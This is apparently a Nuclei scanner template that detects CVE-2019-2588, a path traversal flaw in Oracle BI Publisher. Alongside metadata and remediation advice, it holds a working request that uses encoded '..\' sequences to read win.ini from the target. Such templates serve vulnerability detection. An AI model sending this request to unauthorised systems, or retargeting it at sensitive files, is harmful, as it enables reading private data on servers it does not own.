Oracle Business Intelligence - Path Traversal

id: CVE-2019-2588

info:
  name: Oracle Business Intelligence  - Path Traversal
  author: madrobot
  severity: medium
  description: |
    Oracle Business Intelligence versions 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0 are vulnerable to path traversal in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security).
  impact: |
    An attacker can read sensitive files on the system, potentially leading to unauthorized access or exposure of sensitive information.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to fix the path traversal vulnerability.
  reference:
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2588
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/lnick2023/nicenice
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.9
    cve-id: CVE-2019-2588
    epss-score: 0.13765
    epss-percentile: 0.955
    cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: business_intelligence_publisher
  tags: cve,cve2019,oracle,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'for 16-bit app support'

      - type: status
        status:
          - 200
# digest: 490a004630440220522cc263720956123b1ad747c68a690cc689b543c9952b145b1f539fbbb1b5f0022052a962e2b8230c9a71d4a9b2577101254e268b029448c52838fb192fdb13ff4c:922c64590222798bb761d5b6d8e72950